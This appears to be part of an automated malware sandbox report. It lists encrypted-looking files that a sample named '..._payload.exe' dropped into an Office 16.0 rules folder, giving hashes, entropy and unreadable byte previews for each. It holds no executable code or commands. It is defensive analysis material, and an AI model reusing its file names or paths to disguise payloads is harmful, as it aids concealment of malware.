                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1776
                                                                                                      Entropy (8bit):7.894367797178393
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:PUb1fGJJo4gjX2jOEgxrItIR4AGlfFPsKwMwD:PUlGXoPciJIsWfFPvc
                                                                                                      MD5:96ED989C2CAD91F6E63B72850A1E4609
                                                                                                      SHA1:686281A52920955355B6FEAEEB2EC7ECAD65DBD8
                                                                                                      SHA-256:51048DB0AFE3C9998BD9ECF31DEE699786656485A42A8CACEDC299CBD05088D8
                                                                                                      SHA-512:FF048DA151D86639F797F094758C08ABACBFB055327531CA66F86BC49A6A1A2BC32A211DFD3C71F8A1B139F65063D12EDF9C9553988F6417A0BF4B88C41DD861
                                                                                                      Malicious:false
                                                                                                      Preview:.<??7...i.H...A......7"F....V...U4.6/q..0.h]..t ._.G.p ............0[.`U....o.b.|.+./.Ny..I.....y..u.a.....=.8..a..Qc.%sV.|......4.4p.g.XNS7.k}.X..%.a#.....(u.'.........K..Tv@.\N..hf.^.@..y...J........Z./=j.".....?..>nc;..<E.n..k|2#.^HA.....[...s....F...`....p.:......(6..J5....7$..A.=l.?K .h..o....}a.`.].^?..}~0F.]wp~ 0N.. .......H..~..NW.A}..c.N.P..[.i.)5.#..@.......l.'..k..K.i..u....o.@.O..........F..R...7.}..g>..'*8z......x.....\B..1.p.......K...,.k..Nh...*c...u.......IJ..:[.".\.7....]>lZ.F .:...wqB^....B..A .[.q.6e..q...#$...g....w....`.'H....QN......-.........vr....W.D;...Wp...i..s....../..UI..1a..D..........c.j.yu...!@k.*..... .z.._...!....<.p.h.L.......a...c...d.c5.4] aq...pE..M.....N.i...... ....!.(..4x.$...ea7.....)F...*?.....~..k.T6 .xr..Y....c}S!.q...{.b.H.(.n.I.)G..B-.b\..Dq.!........z.b9...PJ....&......hv..0...._.......2.!.T.Ncf1V..^.e...V%."..1..*..."..|O.n...)).8...si.]..T...cZ........g?.O....GIJ%.,D.j..;g.. ......=

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703900v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1724
                                                                                                      Entropy (8bit):7.895989826126426
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:U4zUriwHVEdKbEYfeHCmd+ISjqdb5kqkkW2ZXqrjYwD:U4griSEfH1gISsb80M1
                                                                                                      MD5:CC217ACFA12E77F6DC1536CC034A3A26
                                                                                                      SHA1:17010B68E55404D706B6D85333EC89830595FFA8
                                                                                                      SHA-256:EA50DC88B3A4EAD1654B4C2B007271CE96AC68F0392EF0EEEFB244D8C4906B62
                                                                                                      SHA-512:B9EAC8B502F183B3D6C3B744230363265336BE9AE8C6ABDE1A0F314557F0C093DB71818653B6AC109E25B6C5802B0C307EE9A911AB13CE24259C34F1C6D78A77
                                                                                                      Malicious:false
                                                                                                      Preview:.<?e.CLw..\...v............(....gZI;.....Ey.`...7...-.2.2.U.6.7..f.*......&....o......;.l......t.k..-.r....'..F.q.Lq....i.......,..kF.#O]..&<.=?n.1.4....3KD.ml.z l.<....;.....n.................J.K.b......]9..g..<D)pI...C5A.......Z^^f.|$C.`.._...iH!..Y....J.w...`2.+.L.N......X..&F...)G.Y...6N..e....... F.Q..jV.>3..........^..5&..>:.......\..(....g[^.;.:U...?.w.)..%........"B..C.w..o|&,S..rN.*h/y.~rZF...!.0N....5..l>..a..8F.&s..,.o.g.Eg7..,.I...'.....N..8.....j......L.X..xG...M...z..`.NK.Z...Z......a..C.T.0....P.../.0..+......e...<..`H.@#..u.....I.=..B"1...R..Q..d.. ..j@..\4.E.IBL.Zh.*.T.+...g....a6.<-;....[....Q..N.Q...YL.............#.%.5.../.7?v....TA..AM.;....:.N.b\l..=T.._o..3..78.<;.AHb.\R.t9..=....@.......\..Z..s7.q._.,..3......~d.....'...y.Kxa..\....pYl..9X.x...P ..)...qj..&BA..)..X.....Q....S..f..4..B....o.r....Yo..-..%..l.hZ..1+.eT"9..~.Z....v4bM.H..V.....V.X..]...~J.r..C..2^..l1...__...l.}..;.....&2..U.[&.......}.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703901v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1761
                                                                                                      Entropy (8bit):7.887969131337209
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:mVUgrfSyWfN+LzNsygHTuzi3wJsWxclNRgXXcwD:i1INcsySTd3w6gmNAl
                                                                                                      MD5:C59B04A3D9D6A1CD4B52884B0F02AE55
                                                                                                      SHA1:5CC7B41035E09F72C7E52D717ABF02474F0C0CD9
                                                                                                      SHA-256:BB38C996A0044DF0556FDDD06A78BEA42CDC9F3273CD6C46958990C8A29D9ED4
                                                                                                      SHA-512:0464082F0151A7DA254401933531D643F6CB641030B91DE8D7022AFC9FC86170931C54682EBE5269DB9DCECAC8B2FB6DB64296C4FB8A8A868E06C75EE7EC15C8
                                                                                                      Malicious:false
                                                                                                      Preview:.<?r...h....C_..W..L{Mo...BE.]..,+.T.$.....M.._.r[.p..pI..........L....r.f$........n.GG....Q..$...n...$.Z..1..~A.T.P.R....?.h.z....b(.+.Ce?.|.x.....8..&.%.I.bR...=..<..*7[Zp.[...6W.7K.Sz.#>.,E.t.@..)...&..`....}..%..:S..Y.p..JM?.0.(7.[.C.Cy.+........K=...e.Z=......4..?_#....n...;...J.IAo.%62./.$.M..C...f.8..1B......?[O.......A.|W..yJ0.W.....p.[..E~Y!...c.!.?.=q.2....R.A.).. ..y..UR.[.$B...x.z....S.k..@i04.e.E.MB8.Mgq)..k......aE.....D....vy.....Q....T0....j..B..|...y.._.f......U=$..yp...<.....C.c+u......:.H2k=.%..:...9e.'..n.&...";`$....Z+.\XE.X...D.}.....rBh..(-.,..&....[.&. ..9s^...^.U..FT.+..v&.h...bW.5...jv.y...../...F..?......;.......s.n....azr.Q...SR..5....Z.....!.....0.....:X.P.:.Bv....yXFW0.Z..B..#...u...VtS(.>Vb.ex...N4N.........o..#a[.&.@&.P.q'.<...hcjs...p...T.)..:.M....._H.;.~K.6...V....G=.5...8....c..gD.....k:..I.B_...u..Bh.........V...%..C.....6\[.Fl....?..p.f.......y../;P..O;...W...0.L...=...!`.{..F.....D06G.[.$.%.@.e.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703950v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1700
                                                                                                      Entropy (8bit):7.878771126991061
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:XaqI5ShKA2fzFmVI2Bpe8gIVCVpRGtzMqXxtNz4Wkw4IZ1fyDndD6xsBsRyS8fBs:XhIwuotOrV2mGNdw7desNS8fBwD
                                                                                                      MD5:8563960E27FC950F1D6B08C09756287B
                                                                                                      SHA1:D561913CD5B0F6D4F0CBCDA24A1E05B3B789E723
                                                                                                      SHA-256:B90B92B29BB2EB507247D2E1B4F1818D9804BFC12B5183136E9481BDC6306373
                                                                                                      SHA-512:F6D95BC294916B67A5460AA36A74EF4EA8CF75B3E809F9FAEC3F97CE58B32379B4AB0827A3269E1B34E988DF1842A42014750127FE04946FD8F331E84BD60CCA
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.k~v.@..|...Y..4f=..d....p...g.#..6...hJ......J.ODp.....,..B...[..i...*XmF.}.J.M<w.X.$y........@.|.....\g?g.k}.....k\.J...oP.`....k..A<?..32t.2.c....+c%JH2...O...0Y.~.Z..f.......*....D1.i....MS...P}....!h+io.m.FVns.Y......^......|3...X..X..m~...nGq ....R>z..0z....O..~..T......,..d.....5.32Fq.3...8.:..P.IwJ....`.1.v......+.yn...%........>Y.ww...HM.T59,....Jz..6.9..{..,.S.....:..Z..fi..3(......'.......bv..3..m0$o..h...`...3.[F...#,..x*#....SR.....R..>tKY]%uq0.d..eE(P?9.+..4.%...i2.C.3~.._....\.....f.7..2u.....d..C.....T..]...g.u.348e...B....f.[NJD....r4..CR.....>.l..mL..-....y*...&.. ...j]"3R..q=b..].".p.(.,*...h..?...i..A./x.i....4d...Nu7. 12k.2.|.w...B...%0F..u.......v+....."....i.<...*....Yu.Wa........"y....u@.w{r..*.EG.....P...j......ZB.i..N.....s.cd..Xw....:...e.+..*..M_v..D.Ww.I....4ba..NcU.0.B...).rKA.xj[#.....E!.7...G.+2.np...r.DeI..l..b..\...#6.D$.....y...hp]c}h...Zw.....So..~F.'&'|.D ..S..<s....0./.1.<.v.3.0..A#...e./!.'..C.-.I....,.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703951v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1737
                                                                                                      Entropy (8bit):7.889028225120575
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:xfBaq0DNBK7dagi0m0adF/xJ12raJ9/ApYLgwD:xJaxNBK7dan0veFpJ1W29ApGZ
                                                                                                      MD5:AA1B0AD0FAC4DDA4736CF079A4354A27
                                                                                                      SHA1:6E11A66988D81DA8B86ED10B101AD567DF6B01DF
                                                                                                      SHA-256:2D264A077F95E798E27EBAE533FF3B5A55E9A5F41DADE6EF1B495EA2112FA96A
                                                                                                      SHA-512:63DB638AB3F7E8305E8AC4346C1B1A5A1398C2B3A75BB269E4323D7E4FFFFD73EE82684F6C07977C4C06DD0CADDC6C3DCE75786B4DAD6E0BAA108B19E4BAA737
                                                                                                      Malicious:false
                                                                                                      Preview:.<?$c>.Nc.5.x.m...........u.MT..>..+#3G...O..t..W.W.ah.Y.Z......#......p^.....i.?........i9+..71..)...h.\...8...WC....I..4...o.2f...t.oq..&.Ud..k-Y'r:$.R..PII"Z.`...2.YW.....j8..O..%.R...V....I.K.....x.F..}Q+...[<`.........f..v%D*.:..yk.*..)9..G..h...:|..B~oC"[$....[)fX1.9.#xp..EiE.P...`.......G...{....u..^.W..O.p.J.W..dRn..s...R&..|.....4.=S.y..."......'o..~....I./...I..Qp{)q...#.....KS..HCEg&...c.W...."nE5..."....{.......].B.j9".2...g.W7s..7#...SoONk.j.=.w:.lZ.D...U@J.9k~^.%Ri.@.$..]..>.P..h.B.v....6..L..r.T.L..J..V.)./:....%}i...$G...`.....Na.P.\VC...K...T_...}L....R...%.S......7*v.sV....SLg....1...h?d...VQ/..:...^6.g.YGn;....t.Bh L8.z.....f|Dx.g....]....a.....!......*J..-..f.O....ec...B..'.B.x..0. 2}qbp*.....`.&i....nW....l)..7.r..~T[]'8.k.)..`~...k{}B@w|48..^ ym ..w..z..F\...k....)...(.V.*..9.>6.0.....M.'W.Z .I~%..u..m....&M.....F..tO...~.B.<)...8..7.P.....>...BJ...b..s....Q..x.TQ.g.3.H..R......c....fEJ.....t...E%+..Ux.(.].`?..T

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704000v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1716
                                                                                                      Entropy (8bit):7.890634463291161
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:U49PPcM6xQw4mK464bUYDOSJm6Ld2j3UwD:dPcznjFbUYDO87d2Lt
                                                                                                      MD5:D9BE85C41036C38143820F21327B5E29
                                                                                                      SHA1:5C24A465057A1F643B9D89CCECC7E2F5D013A58D
                                                                                                      SHA-256:D37CF027CAF214A1ABA476B51BF7A740ADE85E859FAE80DF5EB98653F389B35C
                                                                                                      SHA-512:D49F2B7864F0EFFDE586A9262F59F04493E0AC7319CBB0766F4A99E0B48AFFA93EBC7C2EADA134F62118318990378B7DBFE684D9B103C88DF97F21C7CB751ECF
                                                                                                      Malicious:false
                                                                                                      Preview:.<?....d....3..G..B..l..4..6.....e.........K...@...=.w@...?.D.\#s...m...`.e..T.|.U..`.....[...../...Sk....?..k.....H..Y.D.g...q%}p......G;.-b.^kJ..A.7.....E.5tX0..$.....[....W_.?..Z.P.W._.e:.r......*6.&.....C.,....#._.c}..7..l/lN...^.C....(.n.@..1..n-....28...e.p..N.0....gEI@V....E.&.Y..+..B....Mb<i.mi....n..(l.l......-......=.LT..x.H...^. |. .F.3.j...O..7k@..... G.K.g.....q..<..cw..9....o.._u..w.'.A.Z.^....BA%{..% T..R..%...h.$....9..!.#Q..:.._.>\.(.C... +0E.f>....q..t.j@.e.Qr..l../JfSjA/...a.........=L....v........b4.0R.-2(.P...L.>......:...[.3+.tV..w.&..p.;./boC..N...8.r...<.k..-....1.......vF$...a.*Z.......%s..X.....@"...Q/D.|.&.bc.Qf.o.#.. .......3.JO..J...f.$#."..1M^P.....\.R7.L#"..>..'..0...\.....!..y..j%L=@..m...d..sW..>.R.b..@L.Eo..`....X]</Aat.....j6.|..Ey........U..H...3.g.<.....I...b.".&.".+.....\...7..hz`...;..H......Sf.}o...-.....c.r........I.?.G.(....2.XS.~.6./..o&.YM...B.A.m.~.Na..6.hf..M.w............R.....J..........9.pZ....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704001v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1753
                                                                                                      Entropy (8bit):7.8868776118843
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:FUskJhIJg5rWrA1piI2gavnK1gUeYUXXE0OEsRNy/qlDDiNWupGXf8O8ffv6bD:SskvIJEWoDsKarY70O4/qKC8ffwD
                                                                                                      MD5:D0C911C21F664E18B4CB39D43CDA0AD8
                                                                                                      SHA1:2DD39BDFFF951360FB33F8C42CA400C1AB338A73
                                                                                                      SHA-256:E99E1577B28071BB8C664C3DB5E4A05121AD267EF081599BA6156B183AB0C9E0
                                                                                                      SHA-512:04549D7CCD27E44F970DAAD73CDC4A8B84EB443EBDF143F37871079F4A0A5ACB6A9D19356A61D25341DA5A36CF09ECF84C7B68656F1895D8123CCB95DE47E38E
                                                                                                      Malicious:false
                                                                                                      Preview:.<?....ccw.+_......G./..<.&.\@.?...i...j.Kk.../..L.OU...f~Y.1i.P.^..d.NX.4qE...@2.D'o../....M.5..+..p.0..KM../D...'.....-..T?..c.~.....&.0...k1.Wl.f.j.Ia..F.r...4..._.v.....l.I.r.....#-}G%.m..A...4.nd......g..^...j...M,......w....}.!.S'=.)lk...Z.......e2\.U.>..]...2.K..L[**..{...;.g.p.g..&y.J.^%-_B..I...{.L.}.E..1/.8%.{<.../..N.N=p.j..>4...<i.@..;/]Q.*b./......YX.RF...c.~1}t......}~.=.G.K..u.k}....lk..._.^.drh......G..A.A....3...:.......3}a.......U.6eg....}.....#...HtP........$..7.....!.>...Q..T.m..8....m(FQ..4.i`......it..s..%.F.......h...!|....a\..6i...n.'.....!l.7..#..k.[8zl....s.......\..".-wi.}'cy..E...I.v;.. ....^..+Cm.....(.q?..+.l...H..dY...&1]I.]..I.H..@.....6..... ....T..{.....Nlnb.<W]w....,.=_V.]........bp....fG...c.&..w.......\...[.uS.H,...J.Eh.c..Ls....z..?|.fl.SZ.x...[.{..`w..".@.h/......=.s.4.}E'..Db...."...U...5T.....:t{I\.?..T.^......L..MA...Z2.s..\......f3B2.<8..H...X...k.i6.UA.1..S!.E...H.;..Di.....g

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704050v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1690
                                                                                                      Entropy (8bit):7.896257668724921
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:mwPbkTanOFcapr8DaiagH8YpswWamr695UXg74gwD:jA+GcaprmagJnWzMcSq
                                                                                                      MD5:4C11C6C532CF282055F09F9B6DD326BD
                                                                                                      SHA1:A2304D51693DE629B302DD606FDB48569A23B5C2
                                                                                                      SHA-256:8FB285CCE9E6CAA65A8EA463C2FDC3017CB160FD768AEA848214105952722A48
                                                                                                      SHA-512:A46082DE3800182371E3C26DE02D8506BFF26FB55B091F8A1097FA29C42377A61BC898B38ABE67E8CFBAB122A176283DFEA371F4EA311C56961EE86E5D40E021
                                                                                                      Malicious:false
                                                                                                      Preview:.<?(..fx...X.).....s.K..{...E.{7.e.../..4.5.kK...@5F..`2.Y..x.........N,..s.8..t......l.......*.L.3..g..2....9u..6.=!.I....*:.J.&...\.ae.8.(..L..Ne...........*}........vR.s....n.......}.....H+K.@.#..x.|0...6p....&..#....cR.....^U.._.)...Y21..l.!Z.ru....C.pp...h..0]t.f..}....h.o..jsF'f..6.r'm.f...._>.I.y..hTU7.b.]..}&.{u*..`?.w.1Pm.*......)........Q...A.!..Q....k.......O{.A.s.K...".)Iy.(.t! t...=..".8'W..av..y..M:.....9M....\j.j...%.x.....c..[l....O...^....r#.....w9....m...1*.*..{.......f....[.t..|.D.l...-..|_5E...9A..$.',....A~.,.... n....f!h^...]....6.4.p.S....'..@{.X.Hcf....?.W....0x..W.......-9...mMq.....|Q+..[h.sW....#.~U....m.L..Z....U.r...;.s...Y(..+z,..3n>.2c.p..;..A8".....Al......{.^.......,..5b..#.....zS..........^._.....9l..8...S=&?..@.%.=.....B...Z.*k...rTD....r.;Jj...^.4......2...8.....n.m....f.4..K>h$.....?7.Dm.].a....[e<|g..Hz..{..^....G|C..?........Ij.._....F.ZB.aN.V&.U'M.Mb#1S.Hgwc.sT>/.....&..L....#....?..J~..g).d.7..FP...X.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704051v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1727
                                                                                                      Entropy (8bit):7.856771727576687
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:d0wklHYxNJMmkV+WhmJO4aIOYmTKQNO63UOF0Wi0owD:6wBJkcWh7RZYm+B3WBx
                                                                                                      MD5:B185772CC723F8411FE7053BE8A3BC85
                                                                                                      SHA1:1B8D8FD17B752EAA8430FDF666BB8B17EEF8A874
                                                                                                      SHA-256:301E5C6D5591C97C94BBD805C1D5E0073937D9C84BD0D61175E4E6981A5445BE
                                                                                                      SHA-512:D87302A3B25BBD4B0B3B3C3FAA6BDB233FA81184A38F3A9769B4C228C17C467E66B19D86CC84DD5A7457202069758F0E02263F67BFD7335202477F5B854754E7
                                                                                                      Malicious:false
                                                                                                      Preview:.<?=.t..>...........WU.P.x[G{Pa.....?V$W^...[..g.Ym..|s.IV../..Q.G.'..........0K.k...7il..I.2.0-+.|..2M..W.q $..^~.Q._.d.&.y0k:..yM......9y....>..|........:..5.F.#.|3j|f..Q9..u7R.R9Pn...:..u.VP%..7Y.C..WxZ...N..6.(|.k.x.......c...sM...g..iR.|....U..X..a..k....YA..mm....R.X......s..G.W................>. .UZ......*....muZm.F..J;}..g.rs...b..i}..-..p..}......k?c.. .px.|=O.=.........HP..i..DRM.m-...>.3U...8;r.[..h.....T.u...Z...z.......?.....k...TO..I.-=K....qk =...uzOG....j|..hT............../:...i..Z+[.w.&..>...A.....H.R..~..w....%...UL.P.`m~8,.{t.Mn.....`D.a.Z...0.w....MY..2$ i..g.g...b`..O-..4.O.zD<p.1Jf...E-{;..U4...}Bf7.9~..G4...m.{.:.3.v].X@U2?+..l.a..).#..B..3ddH.....M&..P...$...`E.........p...m...s8...&dh.*...L9..[8O..U.iK[.*y=*.....3C OD..%.~....z...;MgE.J..ql..(.....@Sg*...u.v$.G...E.-y.cj39.E...~..d....b.E.....r"..l:.P.\....|...\vI.u{.F.iu.u....._..\.u..s2....l(."....eT.......\k.k.E.Y.|..I6.g].....R.jU(>.Cq..R..@.o.QzF(vVr

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704100v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1696
                                                                                                      Entropy (8bit):7.882251249746972
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:x2D1fPZ0KTh6iHAk0Rs4E1fk8UQHNJu6S68wD:u1XeehSR1Ws8XNJr
                                                                                                      MD5:246A1D36B608D7A70214C0813B0425D7
                                                                                                      SHA1:E30F39577D523B98A00A0453BC44756B4608C8D1
                                                                                                      SHA-256:C406DE9628D030D6A8CEFF671F9E3B5145EC2E702CBFAC05EDBE86A43677251A
                                                                                                      SHA-512:46C4249684B58535AA0B17C936B8207CED6AAF1011FC637CB6BD73BFC1B8D78CE3AF6F746BEBC0741F4946D9492CFB66F4D8480A9328E7D69962B0116ED3A49A
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.K...W.|!3...[..t....e..E.#.DO*{.9a...lPYW..}G.F|...k...J...(.14..r.N9..@.........<._>.k..9...k......:......]JW.v...../..............na...w...i.......z.OXWhc...sJ.{8..N.[.I@e.'u\......}..H..O.6".q....w.2..0.s...........W.~!.lK..U.^..::b.....?.0C..$c&.7.#=./.].9.h...<.k.V<...c..z..{.$".s..>.<..8.s^.....a..*.....f.%.. .....`.z5..1..aV^0 .O..8.....h|J'ow...J..q..TC..U$.....B<...[.^....p..1.2.~..e. .s....ay...p..f3[.....".w.....{.L......W........ .yH.W.m>.?.N...Q......E.ljvb.3b.../Yw....?..+..e...5.N..uD..U..).Z0...b.........5Izaj....0...-....~..,A....d...f7..C.._.!.x.E...`H^H.tUr...........;].K..|..s.Q..4......h9/.5.7.E.>....q...+3<W../_.P.....(.Lu.U....@....9...m.U.RXvp.@.MqbF.-.<.p...Y.h.\..#.C$..oO...<...:1... ....Y.N'....3.A.Z...p.x.:....Fr...NeS.'.8.^*\..n....t.`o3"....obwX{+....o.#f..s.m.)-.<.G.k...h...S.r-...U...].(....'.>yZ(.'Ca...cQ.q^'-.{...Atu.m.SF.......I.[7.t....<...$L#(ny.ze...;H......`.;"[.^VaRy..}.=.\G.iA.Y..J...v_..x|...+z

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704101v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1733
                                                                                                      Entropy (8bit):7.873135926456122
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:tQRjksHrvIANWepIHoFamCD67Tlg3WasBP6CpPWb2wD:SksLQepIH6ZRPvh8
                                                                                                      MD5:BA5B8FF02B66B62D82303D8126A991FA
                                                                                                      SHA1:64D8D3DB5C88AE354F5A626062A8333F23EC36FE
                                                                                                      SHA-256:4A7DC62C1A8508DB3677BCDB71D20EED75CB22465FC2F462E70D89CC6E55FE4E
                                                                                                      SHA-512:CB88B43902B759098B6F4F5ECBA118759C12D2F58E2D3BD96C1E7214C59A1AB8DF87578F981E65E42FE389C3C1A1D4BA95C73BC902DE7405BA33A20B6862A97F
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.....d%..7.y9.o%.d.#_\.]....1...=.F..]...8.;u.^../.......@.......n..$-WRu6.\....~...%?.T6....'...q@.+.......4...B.........3B.l.!<>S..x.,K.R.......Z...$W.<.H36....o...............B.Od.....z..\..mW.m.F.c.'.[... .o...WG!.|.i.VK.P.....-....y.~".Y....2....|...{o....+r..7.... ..y.~..b..G.Y.k....AO.........'c.W..?.f..?y=F-..+pD.m~&E.d.......3.5...*.TK.G..s...._.6.`v.......%.C....*....].....e\.U......kf.I7i...,9R'...dN.A.?.'._....^.0.i....B..'..(.!.^4N..m...QC.}+....G{.....R"lP...A.Q;.....l...!2.$.o.%...6)....y!DS.L..O.k........HS.[.>X.e.s1.T.Ls.}.'......_v.\.-.......L........I-..~.}..5...r..=.R;>i.. <.....1.....!....'Z..<7.g#...l...Y..e8YUY.O..;K.&..y....vP.....b7V.kg.....F..~2.j.M....9~.z|z...S...h.H.....}... ..:8.Y7.......}(.......g...iq.].Kf..^*.......e.O.+.t...'E3.q....\......8uo...(.W.v..A...8.k..cv..%..F..V.......f.O._..H.Vy..h.y...o..........j.4.4..eO.B5.Sh'.l_.;.._n..a......@..#...G..9....T..X.,...A.n!.Q.S{...g.....4.t.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704150v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1696
                                                                                                      Entropy (8bit):7.880471891748623
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:5I4tcXhNUUbQuZtwOe5RCNrx2MR4SHaI4/1TJBuywD:G4SXh2eQuZtwZ5G1R4SHCdTJBu
                                                                                                      MD5:44DAB5792E2C804556164AA6A653AD75
                                                                                                      SHA1:C86371DCF10FD4F311EC01356595CC7C63900A62
                                                                                                      SHA-256:CBD72F9FC9A07DA656F390586B56DC6E5A1DABF2CDB9893935DE7D85CFFD4A18
                                                                                                      SHA-512:1A433841852DDC7F6E7BAB78A09E54D57D4F4CDE116F20D59B0EA4EA3F361556C3218C1FF2EA73462BD0FC17E8CA28F1CB2CA3A26DA2ADF82DE367C9DF26AF5F
                                                                                                      Malicious:false
                                                                                                      Preview:.<?XLt..x.:bj...s}YU.O.<[..Mm.O....jH&..g.m.|^...Pa.....}..HF......w?......V.m..Z.5R.d..r..w...b...r3...#.-I..d.....v.;..G.;.}es.\..U.(g..b.5....8....edIL.qjty.N.L...C.6/.H....O..... ...L.....u...G..Lb..<q...^>..z...0Q1Z.y..|+U..VQ..2...$...O...c:...M].wp&...H..N.....`.x...< KZs{.*...=...O\#.G.H.e.......C+......@..:.f..O.....l+..<....Oi..w.V.\.h..U..dNU0=.KbS..r7?..M_.ew.>K+....|...$.v+..n.\\...L*M(E.?.u$..B..}+/.9,...-e.b3.H.nx.......</j..AA..l_+."+..T.U'_....^.7W$.[.=gy#.2..O..W.=Y........'......x.l,..e".}5^]~..*H..G......)^.....'.^Xd.7..!.!2..f.b...y....:}.}.$u.....2@%06.,Ad.d...(...cvk...5.=2..Y.....m.&$.c<D.Mus.9.]. ..6..X.C.:..a..$.E2<S.Vy....X...YQ(O...Vx..SP.....o..3..v.&..g........!).W....U.....i.......H......N.\.d.r4..X;..`........F.pUv..x.....H.m..-.s..)........M.Z#.d@..+.ai.#..d.8..w.0...d.+K.$..x..v........tg}.fTDc]c.............._BT...U......d..(zI..y..e.........ny..o+.U...ql...+.#.l!.%..../.x...[......1...4.}...Z...q.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704151v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1733
                                                                                                      Entropy (8bit):7.874665972739224
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:naTxP1K869ijPTOWQYGxQ45GTFPIcy0R1viBmVewD:aTxNK86wPOE2Q4cFPIgvlT
                                                                                                      MD5:E5CA28E6A4B453D2C6A65F8BE5FB63A6
                                                                                                      SHA1:BDFAB56FCDDE1C03FE05C30B16C4ED4E029380B0
                                                                                                      SHA-256:6FA9414A59FBEDA33082B0F30B9E4938B384203D8E7AF720F468D3EF59981711
                                                                                                      SHA-512:3B8B28F9DF9AF2F0E60978A9EBD69D7D89920617D26D0F8D9130622A853B5A384985FA81C95DD023C921849C3D2150E2FBFBC6DCD108F5E1DBA424B96E530121
                                                                                                      Malicious:false
